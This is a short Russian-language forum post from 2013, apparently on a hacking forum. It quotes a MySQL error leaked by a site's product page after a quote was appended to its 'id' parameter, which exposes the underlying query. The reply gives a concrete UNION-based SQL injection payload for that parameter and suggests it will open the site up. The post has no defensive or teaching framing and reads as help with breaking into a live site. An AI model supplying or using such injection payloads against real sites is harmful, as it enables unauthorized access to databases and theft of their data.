19.06.2013, 22:12
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от None
Ставлю в конце ковычку одинарную &id=5151' - вот что получаю в ответ:
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1
Query: SELECT `id`, `name`, `uniqum`, `image`, `catsID` FROM `ap_products` WHERE `enable`=1 AND `id` IN(0,5151')
Думаю, нужно попробовать так
&id= 5151)+and+1=2+union+select+111,222,333,444,555+--+
Ну и понеслась...
|
|
|